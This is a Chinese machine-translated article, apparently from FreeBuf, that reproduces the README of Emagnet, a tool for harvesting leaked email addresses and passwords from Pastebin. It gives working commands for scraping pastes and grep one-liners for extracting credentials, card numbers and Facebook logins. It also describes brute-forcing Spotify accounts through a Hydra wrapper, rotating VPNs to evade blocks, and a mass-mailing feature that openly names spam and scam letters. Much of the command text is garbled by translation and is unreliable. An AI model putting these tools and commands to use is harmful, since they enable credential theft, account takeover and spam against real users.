magnet协议 EMAGNET：从Pastebin上传的泄漏数据库中捕获电子邮件地址和密码

Emagnet是一个非常强大的工具，它的主要目的是从pastebin上传的泄露数据库中捕获电子邮件地址和密码。当密码不在pastebin.com的名单上时，几乎不可能找到泄露的密码。他们已经被pastebin的技术人员删除，或者只由个人上传。老实说，这比大海捞针，然后用我们要收集的数据在pastebin上找到过时的上传内容要容易得多。

下一次推送中将修复的已知问题！

宋承宪强力器功能不全

安卓设备依赖包不能和暴力工具+屏幕一起使用

将错误数据发送到emagnet.log以获取包含正确数据的文件

Demo – 它是如何工作的

下图左边是你运行时看到的界面，右边是后台实际运行的内容。

当然，一切都将存储在日志目录(过滤后的电子邮件地址)中

真实世界操作的例子

git clone https://github.com/wuseman/emagnet CD emagnetchmod+x emagnet *.../emagnet-emagnet通过Termux在Android上运行

不用termux也可以工作，但是必须安装wget+curl

从游戏商店下载termux

安装后，复制并粘贴以下命令:

echo-e ' pkg update pkg upgrade-y pkg install wget curl git-y git clone https://github.com/wuseman/emagnet CD emagnet bash emagnet-emagnet '>;在Windows 10上

请访问我的安装维基了解更多信息(包括视频)

现在耐心将是你成功的关键！:-)

这里有几个常见问题

问:为什么不在我们暂时被封禁的情况下，用curl直接获取url，用tor更改IP？

答:因为我们必须完成验证才能获得href = " https://www . cloudflare . com/5xx-error-landing？Utm_source=iuam作为响应。如果只是想偶尔从pastebin中抓取一些上传，可以在shell中复制粘贴下面的代码。

卡特彼勒<。& ltEOF >；emagnet-curl.sh #！/bin/bash curl-ls https://pastebin . com | grep-o-e 'href="([^"#]+)"' | cut-d ' " '-F2 | grep archive-a10 | sed-n 2，9p | sed 's/^/http://pastebin.com/raw/g' & gt；/tmp/。读取行时出错；do wget-q $ line；完成<。/tmp/。emagnet clear printf "成功下载$(cat /tmp/。来自pastebin的emagnet|wc -l)文件:n$(cat /tmp/。emagnet | cut-d/-F5 | xargs)" EOF chmod+x emagnet-curl . sh bash emagnet-curl . sh

问:为什么你想删除自动破解电子邮件地址的功能？

答:已经重新添加到Emagnet，接下来会添加支持更多协议的bruter。请期待！

问:如何搜索visa或MasterCard？我想知道我的卡是否被泄露了。

答:上传后，将以下内容复制并粘贴到你的shell中:

source/etc/emagnet . conf；格雷普-里奥·'(^|[^0-9]){1}([345]{1}[0-9]{3}|6011){1}[-]？[0-9]{4}[-]?[0-9]{2}[-]?[0-9]{2}-?[0-9]{1,4}($|[^0-9]){1}' $ emagnet

问:Emagnet返回给我的结果是null，你就反复尝试，然后pastebin要求重新验证。那我该怎么办？

答:打开浏览器，跳转到https://pastebin.com，输入验证码。如果这样不行，等一会儿或者用VPN换个新IP。除非你知道如何绕过验证码，在这种情况下，任何工具都无法正常工作。

配置&:修复

在Windows 10上安装Emagnet

1)从微软商店安装Ubuntu或任何其他发行版2)安装完成后，点击“开始”3)现在键入“sudo -s”并输入您的密码4)现在更新repo并安装git，只需复制并粘贴下面的行以便更新；apt安装git-y；git克隆https://github.com/wuseman/emagnet CD emagnet；chmod+x ./emagnet；。/emagnet - emagnet

关于视频的注意事项:->你不再需要运行email gnet-setup，直接运行email gnet即可。

在Linux上

您可以在shell中复制并粘贴以下代码

git克隆https://github.com/wuseman/EMAGNET CD EMAGNET；MACOSX上的Bash emagnet - emagnet

您可以在shell中复制并粘贴以下代码

git克隆https://github.com/wuseman/EMAGNET CD EMAGNET；bash emagnet-ANDROID上的emagnet

视频剪辑

echo-e ' pkg update pkg upgrade-y pkg install wget curl git-y git clone https://github.com/wuseman/emagnet CD emagnet bash emagnet-emagnet '>;emagnet-termox . sh bash emagnet-termox . sh

使用email gnet ' spam '-(这不是垃圾邮件功能)

那么为什么要把这个加到蛮工具上呢？

如果你经营一家企业，你想快速方便地将你的垃圾邮件发送给其他人。

如果想传播尼日利亚字母，可以使用这个功能。

如果你想把你的广告转发给新朋友。

怎么跑

您必须先安装ssmtp，然后才能使用它。

巴布亚企鹅

出现-询问ssmtp

Debian/Ubuntu/Kali/Mint等apt发行版:

apt安装ssmtp

安装完成后，编辑设置，复制粘贴到终端！

下面是gmail的一个例子:

卡特彼勒<。" EOF " >；/etc/SSM TP/SSM TP . conf user = " Uzeman Emagnetz on " mail hub = SMTP . Gmail . com:587 Rewrite domain = Gmail . com # hostname = your localhost . your local domain . TLD TLS _ CA _ FILE =/etc/PKI/TLS/certs/CA-bundle . CRT useTLs = Yes usestartTLs = Yes AuthUser=your_email@gmail.com auth pass = auth method = LOGING FromLineOverride = Yes EOF

现在运行emagnet，直到您有一些电子邮件地址:

。/emagnet -e

然后，运行:

。/emagnet -s

现在，您将看到您想要发送多少个电子邮件地址。如果您选择“是”，您将发送电子邮件。就这么简单！

_ _ _ _ _ _ _ _ _ _ dMMMb。_ .adOOOOOOOOOba. _，dMMMb _ Dp ' ~ ymMb doooooooooooooo AmMP ~ ` Yb V ~ " Mb doooooooooooooooo Dm " ~ V ` Mb。dOOOOOOOOOOOOOOOOOOOb，dM' `YMb。_ | oooooooooooooo | _，dMP ' _ _ ` ymmm | OP ' ~ " yooooooooooo " ~ ` yo | MMMP ' _ _，dMMMb。~ ~ ' OO `YOOOOOP ' OO ` ~ ~，dMMMb。_，dP~ `YMba_ OOb `OOO' dOO _aMMP' ~Yb。_ ` ymmmm ` oOOO OOO oOOO '/MMP '，aa。` ~YMMb `OOOb。_，dOOOb。_，dOOO'dMMP~ '，aa。，dMYYMba。_ ` oooooooooooo ' _，adMYYMb。，MP' `YMMba。_ oooooooooooo _，adMMP' `YM。MP' ~YMMMba。_ YOOOOPVVVVVYOOOOP _，adMMMMP ~ ` YM YMb ~ YMMM ` oooi ``` IOOOO '/MMP ~ DMp ` Mb。` YMMMb`OOOI、、、、、IOOOO'dMMMP '，Dm ' ` ' ` oobnnnnndoo ' ` ' ` ~ oooooo ~ ' = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =目标:8 -是否要向所有目标发送电子邮件(是/否) :是= = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =....................[.好的。] [+]向email2@gmail.com发送电子邮件....................[.好的。] [+]向email3@gmail.com发送电子邮件....................[.好的。] [+]向email4@gmail.com发送电子邮件....................[.好的。] [+]向email5@gmail.com发送电子邮件....................[.好的。] [+]向email6@gmail.com发送电子邮件....................[.好的。] [+]向email7@gmail.com发送电子邮件....................[.ok.] [+]发送电子邮件至email 8 @ gmail.com....................[.ok.]...........等等如何使用蛮力进行spotify

要支持GNU/Linux Gentoo上的emagnet分发，只需执行以下操作:

emerge-ask eselect-repository eselect repository启用palm eix-sync；eix-update emerge-ask = dev-libs/libspotify-12 . 1 . 51 emerge-ask media-libs/portaudio

现在，您可以中断spotify帐户了:

bash emagnet - bruteforce spotify

在Ubuntu/Kali/Debian上:

wget-q-O-https://apt.mopidy.com/mopidy.gpg | sudo apt-key add-wget-q-O/etc/apt/sources . list . d/mopidy . list https://apt.mopidy.com/ stretch . list sudo apt-get update sudo apt-get install libspotify 12 libspotify-dev libportaudio

现在，您可以中断spotify帐户了:

bash emagnet-brunt force Spotify使用emagnet运行VPN

使用您的提供商名称在/etc/openvpn中创建一个文件夹，例如hidemyass:

mkdir -p /etc/openvpn/hidemyass

从提供商的主页下载配置文件，并将其提取到上面创建的文件夹中。

以下是如何使vpn工作的概述(不要忘记将提供商和vpn设置为真)

国家代码将您的文件命名为如下，以使虚拟专用网运行:........................................................................be =比利时/etc/openvpn/VPN provider/VPN provider . be . ovpn BG =保加利亚/etc/openvpn/VPN provider . BG . ovpn cz =捷克共和国/etc/openvpn/VPN provider/VPN provider . cz . ovpn dk =丹麦/etc/openvpn/VPN provider/VPN provider . dk . ovpn es =西班牙/etc/openvpn/VPN provider/VPN provider . es . ovpn fich)/etc/openvpn/VPN provider/VPN provider . hk . ovpn Hu =匈牙利/etc/openvpn/VPN provider . Hu . ovpn it =意大利/etc/openvpn/VPN provider/VPN provider . it . ovpn MD = mold avia/etc/openvpn/VPN provider/VPN provider . MD . ovpn nl =荷兰/etc/openvpn/VPN provider/VPN provider . nl . ovpn no = Norway/etc/etc

当然，如果这是一个新设置，请不要忘记在必要时添加您的登录文件:

对于中的文件。/etc/open VPN/provider/*；do sed-I ' s/auth-user-pass/auth-user-pass login.txt/g' " $ { files } "；行

请参阅emagnet.conf中的VPNCOUNTRYS，了解默认可用的国家和emagnet读取文件的方式。当然你也可以把国家编辑成其他任何地方。

如果您有两个甚至三个提供商，请按照上面的步骤操作，但是请为您的其他提供商编辑VPN提供商2和3，并以VPNCOUNTRYS2和3命名。

快速启动中断的示例脚本:

根据需要修改:

cat >。my-brunt force-tool . sh & lt； | ' /' | ' ' | grep-v '/' & gt；" $ { HYDRA _ TARGETS } " #如果目标文件为空，我们将再次监控目录#直到emagnet下载新文件，否则使用首选工具并攻击您的目标，如果[-s " $ { HYDRA _ TARGETS } "]；然后完成电渗流

更改执行脚本的权限:

chmod+x my-brunt force-tool . sh

运行脚本:

。/my-brunt force-tool . sh

并在另一个窗口中同时启动emagnet。

。/emagnet-emagnet如何在facebook优惠券被泄露时找到它。

搜索和正则表达式

在这个文件夹中，你将存储所有由pastebin上传的下载内容，你可以搜索几乎任何内容。以下是我为你提供的一些例子。

脸书泄露

很多时候Facebook密码是用电话号码而不是邮箱地址上传的，东部有很多漏洞。为了快速找到这些密码，您可以尝试运行以下命令来获得结果:

grep-r-e ' Facebook =[0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9]'-A2

上述命令的输出:

/emagnet/pastebin/ajfa filename:Email Facebook = 0895 xxxxxxx/emagnet/pastebin/ajfa filename-Pass = konxxxxxxxx/emagnet/pastebin/ajfa filename:Email Facebook = 0858 xxxxxxxx/Email GNet/pastebin/ajfa filename-Pass = mxxxxxx/emagnet/pastebin/ajfa filename:Email Facebook = 0895 xxxxx/emagnet/pastebin/ajfa filename-Pass = tax xxxx/emagnet/pastept

IPV4地址

grep -roE '[0-9]{1，3}。[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}' .

HTTPS网址

例1:

grep-reo '(ftp|ftps|http|https)://[^/"]+'

例2:

grep-Eo "(FTP | ftps | http | https)://[a-Za-Z0-9。/?= _-]* |排序| uniq

例3:

cat * | tr " n | grep https*://

示例4->；要在黑暗网络中查找网址，请使用以下命令:

grep -rEo '。*[.]洋葱$

示例1的输出:

文件名:https://www.beachcolony.com文件名:http://java.sun.com文件名:http://www.w3.org文件名:https://br1.api.riotgames.com文件名:https://github.com文件名:http://open OCD . org Ddfadfae:https://www . googletagservices . com文件名:https://www . googletagservices . com文件名:ftp:// 111.111.111:3200文件名:http://www . w3 . org . org文件名:https://www . beach.............

查找图片:

文件名:http://imag-some-site-ekle . com/1/0/V6/hiddenimagevywusewman . jpg文件名:http://images-some-site . com/1/w/4m/hiddenimagevywusewman.jpg文件名:http://image some-sitele . com/1/5/8l/yhiddenimagevywusewman . png文件名:http://imsome-sitees-brsome-siteacklesome-sitem/1/0/16/hiddenimagevywusewman。*).PNG ' # PNG FILES grep-RIoe '(http | https)://(。*).jpg' # JPG档案鹭-里约' http。*[.]jpe？g '

找到泄露的密码:

大多数泄漏的密码的格式是“mail@mail.com:passwd”，您可以使用以下命令来获取它们:

grep -HiEhr -o -e "b[A-Za-z0-9。_%+-]+@[A-Za-z0-9。-]+.[A-Za-z]{2，6}b:...* | grep ' S ' hidden email _ ani @ uni Roma 1 . it:hidden pass 985 hidden email _ le @ unito . it:hidden passina hidden email _ 1969 @ libero . it:hidden pass ro60 hidden email _ o . barbarella @ u nibo . it:hidden passrz 47 hidden email _ ritis @ ingv . it:hidden passcde hidden email _ ia @ polito . it:hidden passrmia hidden email _ I @ unifi . it:

搜索帐户时获得更加用户友好的输出:

1)首先，搜索所有包含您要查找的单词的文件。在这个例子中，我将搜索所有的SPOTIFY帐户:

find/opt/emagnet/archive/-type f | parallel-k-j150 %-n 1000-m grep-H-in ' Spotify ' { }

2)你可能发现我只搜索‘Spotify’会有很大的混乱...然后，我会将所有“MAIL ADDRESS”+“SPOTIFY”更改为:

grep-Reeio " b[A-Za-z0-9。_%+-]+@[A-Za-z0-9。-]+.[A-Za-z]{2，6}b:...*"

3)我想把所有东西一行一行的排序，而不是到处都有很多空单元格。我们可以使用S:

grep 'S '

4)我不在乎文件名，因为我们现在要收集的是‘邮件地址’+‘密码’:

切割-d: -f2，3

5)泄露所有关于pastebin的数据的人有不同的形式来分隔内容，所以我们跳过所有包含‘mail |’的数据；/password/，并以mail:password为目标，因为这是最常用的形式。如果我们愿意，可以以后很容易过滤掉，但是尽量简单。

awk-F“|”“{ print $ 1 }”| cut-d/-f1

6)现在我想保持列表有序:

sort -r

7)当然，我不需要重复内容:

啊，啊！' seed[$ 1]++'

8)如果您希望所有帐户和密码都在一个文件中，您可以使用>:>;将数据写入文件。如果要分隔细节，可以使用:或任何想要使用的字符。如果您想将列表导入自己的sql/mysql数据库，可以使用sed来实现这个目标:

上面的命令| _sed的/:/，/g ' _ & gt；泄露-Spotify-accounts-2019 04 01 _ to _ 2019 04 05 . txt

将上述命令组合成一个单行命令:

find/opt/emagnet/archive/-type f | parallel-k-j150 %-n 1000-m grep-H-in ' Spotify ' { } | grep-Reeio " b[A-Za-z0-9。_%+-]+@[A-Za-z0-9。-]+ .[A-Za-z]{2，6}b:...* | grep ' S ' | cut-d:-F 2，3 | awk-F ' | ' { print $ 1 } ' | cut-d/-f1 | sort-r | less | awk-F，'！seed[$ 1]++' >;泄露-Spotify-accounts-2019 04 01 _ to _ 2019 04 05 . txt

你只需要把“spotify”改成其他目标，比如gmail、paypal、facebook、twitter等等。

系统需求

Bash–寻找关于bash的更多信息

Wget寻找更多关于Wget的信息

Curl–寻找更多关于curl的信息

英国广播公司新闻:“帕斯捷宾:运行黑客宣传其攻击的网站”

Changelog 注意

严禁通过emagnet攻击不同类型的账号，你没有被授予或允许攻击，所以会触犯法律。在一些国家，你可能会因此入狱。当你克隆或下载它时，意味着你需要对你的行为负全部责任。Wuseman不对任何用户的行为负责，所有责任由用户承担。

另外，如果你认为这个项目的开发是出于非法目的，那么我对你的意见不感兴趣，请自行保留！Emagnet不会向任何开发者或其他个人或组织披露任何用户数据。没有统计数据可以跟踪任何用户，所以如果你问我这个问题，我只能回答“我不知道”，老实说我不在乎。

谢谢

最后，感谢m1st每天为我们提供的法律披露。

*参考资料来源:GitHub，FB边肖secist编译，请指出它来自FreeBuf.COM